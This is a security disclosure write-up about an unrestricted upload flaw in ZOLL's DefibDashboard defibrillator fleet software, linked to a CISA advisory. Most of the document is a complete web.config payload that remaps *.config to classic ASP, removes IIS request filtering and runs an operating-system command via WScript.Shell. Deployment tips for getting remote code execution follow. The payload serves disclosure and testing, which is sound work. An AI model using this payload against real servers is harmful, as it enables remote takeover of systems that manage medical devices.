ZOLL DefibDashboard Unrestricted Upload
ZOLL's DefibDashboard is fleet management software for the R-Series of defibrillators. The Wi-Fi enabled defibrillators upload regular maintenance and diagnostic information to the dashboard so that biomedical engineering teams can monitor device readiness.
In affected versions of DefibDashboard a low-privileged user can upload dangerous files to the Device Check File (DCF) facility, resulting in the ability to execute arbitrary commands on the underlying operating system.
For details on this and other responsibly disclosed DefibDashboard vulnerabilities see https://us-cert.cisa.gov/ics/advisories/icsma-21-161-01.
Files submitted to the DCF facility (at /DefibDashboard/Upload.aspx) are saved to the 'Upload' directory directly beneath the web root (at /DefibDashboard/Upload/), where they can be requested by URL.
Web config payload
Because the application places unchecked, user-controlled files in an executable location under the web root, a threat actor can ordinarily upload a file containing ASP.NET code and the server will process the directives, resulting in remote code execution (RCE).
In this case, the DefibDashboard application ships in a precompiled, non-updatable state (updatable="false" in PrecompiledApp.config), so simply uploading a new ASPX file into the web root does not result in code execution: ASP.NET refuses to compile pages that were not part of the precompiled build. Execution is instead achieved in the context of the IIS worker process by uploading a web.config file with embedded ASP code. The uploaded web.config registers a script handler for *.config requests in its own directory and removes the request-filtering rules that normally hide web.config, so a request for the uploaded file itself runs the embedded code. This technique is discussed further elsewhere.
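The following is an added, illustrative web.config payload for the technique described above; it is not the proof of concept from the disclosure and not code from ZOLL. It follows the publicly documented layout (an IIS handler mapping *.config to the classic-ASP ISAPI extension, plus removal of the request-filtering rules, with the script placed in an XML comment after the root element). The handler names, the whoami command and the assumption that the DCF facility stores the file under its original name (web.config) in /DefibDashboard/Upload/ are assumptions made for this example.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <!-- Map *.config requests in this directory to the classic-ASP ISAPI extension.
         Two entries so that either a 64-bit or a 32-bit application pool matches one;
         IIS skips the entry whose preCondition does not hold. Handler names are
         arbitrary (assumption). -->
    <handlers accessPolicy="Read, Script, Write">
      <add name="config_as_asp_64" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\system32\inetsrv\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      <add name="config_as_asp_32" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\SysWOW64\inetsrv\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness32" />
    </handlers>
    <!-- Request filtering blocks the .config extension and the web.config segment by
         default; remove both so that GET /DefibDashboard/Upload/web.config reaches
         the handler instead of returning 404. -->
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
  The ASP code sits in an XML comment after the root element so the file is still
  well-formed for the IIS configuration system. It must not contain the sequence
  of two dashes, which would end the comment early. Because the configuration text
  around the script is echoed into the HTTP response, the script first closes the
  HTML comment, writes its output, then re-opens the comment (each marker is built
  from pieces so no double dash appears in the file).
<%
  Response.Write("-" & "->")
  ' Run an OS command in the application pool identity (whoami is an illustrative
  ' choice, assumption); output proves command execution on the host.
  Set sh = Server.CreateObject("WScript.Shell")
  Set ex = sh.Exec("cmd.exe /c whoami")
  Response.Write("<pre>" & Server.HTMLEncode(ex.StdOut.ReadAll()) & "</pre>")
  Response.Write("<!-" & "-")
%>
-->
```

Once the file is in place, requesting /DefibDashboard/Upload/web.config returns the command output between the echoed configuration text. Two conditions a tester should check first: the classic ASP role feature must be installed on the server (otherwise asp.dll is absent and the handler fails), and the `handlers` and `requestFiltering` sections must not be locked at the applicationHost level (`overrideMode="Deny"`), in which case IIS rejects the directory-level override with a 500.19 error rather than executing anything.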